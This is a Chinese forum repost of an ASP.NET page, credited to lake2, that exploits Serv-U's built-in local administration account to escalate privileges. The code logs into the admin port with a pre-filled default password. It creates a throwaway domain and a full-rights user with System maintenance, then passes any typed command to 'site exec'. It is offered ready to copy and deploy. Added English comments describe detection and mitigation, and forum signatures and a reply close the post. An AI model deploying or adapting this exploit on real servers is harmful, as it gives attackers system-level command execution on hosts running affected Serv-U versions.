
[转载]ServU.aspx

[转载]ServU.aspx

信息来源:lake2的专栏
原始链接:http://blog.csdn.net/lake2/archive/2006/03/16/626273.aspx

ServU的本地提权问题已经很老了,没啥说的,只是相继出现了PHP、Perl版本,当然不能少了aspx版本^_^

以下代码Copy,保存为一个aspx文件即可。
代码:
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

   '
   ' Love, Where are you ?
   
   ' Button handler: drives Serv-U's local administration interface to get a
   ' command executed. Everything connects to 127.0.0.1 only, so this page has to
   ' be running on the Serv-U host itself (hence "local" privilege escalation).
   ' Sequence, as implemented below:
   '   1. connect to the admin port from the form and log in with the supplied
   '      name/password (the defaults in the form are Serv-U's built-in local
   '      administration account);
   '   2. "SITE MAINTENANCE", then delete/re-create a throwaway domain "cctv"
   '      bound to 0.0.0.0:43859;
   '   3. add user "lake"/"admin123" to that domain with HomeDir c:\, full
   '      access rights and -Maintenance=System (the privilege that the later
   '      SITE EXEC depends on);
   '   4. open a second connection to 127.0.0.1:43859, log in as that user and
   '      send "site exec " followed by whatever was typed into Text_cmd;
   '   5. delete the domain again and QUIT.
   ' Defender notes: the admin login, SITE MAINTENANCE, the domain/user changes
   ' on port 43859 and the SITE EXEC should all show up in Serv-U's own logging
   ' if it is enabled, which makes this sequence a reasonable detection rule; the
   ' underlying issue is the fixed local-admin credential in affected Serv-U
   ' versions, so the mitigation is upgrading to a release without it.
   ' Code notes: Text_cmd reaches "site exec" without any validation; Text_Port
   ' is converted to Int32 implicitly (Option Strict is off; non-numeric input
   ' throws); neither TcpClient is closed if anything after Connect throws (no
   ' Using/Finally); Response.End in the Catch blocks ends the request by
   ' raising ThreadAbortException.
   Sub BTN_Start_Click(sender As Object, e As EventArgs)
      Dim Usr As String = Text_Name.Text
      Dim pwd As String = Text_PWD.Text
      Dim Port As Int32 = Text_Port.Text
      Dim Command As String = Text_cmd.Text
   
      ' Serv-U admin protocol strings. Each parameter block is a run of "-Key=Value"
      ' lines; the last line of a block starts with a space instead of "-"
      ' (" TZOKey=", " PortNo=", " Access=") — that appears to be how the block is
      ' terminated, not a typo.
      Dim LoginUser As String = "User " & Usr & vbcrlf
      Dim LoginPass As String = "Pass " & pwd & vbcrlf
      Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
      Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
      ' New user on the throwaway domain: home directory c:\ with every access
      ' flag (RWAMELCDP) and -Maintenance=System.
      Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
              "-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
              "-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
              "-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
              "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
              "-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
              "-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
      Dim Quit As String = "QUIT" & vbcrlf
      Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf
   
      'Dim client As New TcpClient
      ' First connection: the admin port given in the form, loopback only.
      Dim tcpClient As New TcpClient()
      Try
        tcpClient.Connect("127.0.0.1", port)
      Catch eee As Exception
        ' The raw exception text (stack trace included) is written to the page.
        response.write(eee.ToString())
        response.end
      End Try
      tcpClient.ReceiveBufferSize = 1024
      Dim networkStream As NetworkStream = tcpClient.GetStream()
      ' Strict request/response lockstep: every Send is preceded and followed by
      ' one Rec; each Rec reads a single chunk (see Rec for the caveats).
      Rec(networkStream)
      Send(networkStream, LoginUser)
      Rec(networkStream)
      Send(networkStream, LoginPass)
      Rec(networkStream)
      Send(networkStream, MAINTENANCE)
      Rec(networkStream)
      Send(networkStream, DelDomain)
      Rec(networkStream)
      Send(networkStream, NewDomain)
      Rec(networkStream)
      Send(networkStream, NewUser)
      Rec(networkStream)
          ' Second connection: the domain just created on 43859, logging in as
          ' the new user and issuing SITE EXEC with the unvalidated Text_cmd value.
          Dim tcpClient2 As New TcpClient()
          Try
             tcpClient2.Connect("127.0.0.1", 43859)
          Catch eee As Exception
             response.write(eee.ToString())
             response.end
          End Try
          tcpClient2.ReceiveBufferSize = 1024
          Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
          Rec(networkStream2)
          Send(networkStream2, "User lake" & vbcrlf)
          Rec(networkStream2)
          Send(networkStream2, "pass admin123" & vbcrlf)
          Rec(networkStream2)
          Send(networkStream2, "site exec " & Command & vbcrlf)
          Rec(networkStream2)
          tcpClient2.Close()
      ' Clean-up on the admin connection: drop the throwaway domain and quit.
      ' Note this only runs if nothing above threw.
      Send(networkStream, DelDomain)
      Rec(networkStream)
      Send(networkStream, Quit)
      Rec(networkStream)
      tcpClient.Close()
   End Sub
   
   
   
   ' Reads one chunk (at most 1024 bytes) from the stream and echoes it into the
   ' page as "out:...". o is used as a NetworkStream but is declared Object, so
   ' every member access is late-bound.
   ' Caveats visible in the code: the byte count returned by Read is ignored, so
   ' the entire buffer is decoded — and Dim bytes(1024) is 1025 elements in VB —
   ' meaning trailing NUL bytes end up in the output; one Read may also return
   ' only part of a server response. The server text is written into the HTML
   ' without any encoding.
   Sub Rec(o As Object)
     If o.CanRead Then
       Dim bytes(1024) As Byte
       o.Read(bytes, 0, 1024)
       Dim returndata As String = Encoding.ASCII.GetString(bytes)
       response.Write("out:" & returndata & "<br>")
     Else
       response.Write("What&#39;s wrong ?")
     End If
   End Sub
   
   ' ASCII-encodes data, writes it to the stream and echoes the sent text into
   ' the page as "in: ...". o is used as a NetworkStream but is declared Object
   ' (late-bound calls).
   ' Note: the echoed text is written unencoded and includes every line sent,
   ' the "Pass ..." lines with the credentials among them. Write errors are not
   ' caught here; they propagate to the caller.
   Sub Send(o As Object,data As String)
     If o.CanWrite Then
       Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
       o.Write(sendBytes, 0, sendBytes.Length)
       response.write("in: " & data & "<br>")
     Else
       response.Write("What&#39;s wrong ?")
     End If
   End Sub

</script>
<html>
<head>
</head>
<body>
   <!-- Input form for BTN_Start_Click. The pre-filled Name/PWD/Port values are
        the built-in local administration account and loopback admin port that
        affected Serv-U versions ship with; the exploit works only because that
        credential is fixed. "cmd" is passed straight to SITE EXEC. A server
        still exposing this account should be upgraded, and the admin port kept
        off any non-loopback interface. -->
   <form runat="server">
      <p>
        <asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
        admin by lake2</asp:Label>
      </p>
      <p>
        <asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
        <asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
        <br />
        <asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
        <asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
        <br />
        <asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
        <asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
        <br />
        <asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
        <asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
      </p>
      <p>
        <asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
      </p>
      <p>
        <hr />
        <!-- Insert content here -->
      </p>
   </form>
</body>
</html>
人情如冰六月寒,花做一份艳,为谁笑人间? 如果任何人发现我转载的有图像的文章中图像失效或者文章有问题,请及时短消息通知我。先谢谢。::)) coup de foudre


不得不让我为你佩服,lake兄弟啊,我是草草虫啊,看到了请给我短消息,很怀恋lake的群,我号掉了
论坛地址: http://www.ssk2.cn & www.iisuser.com

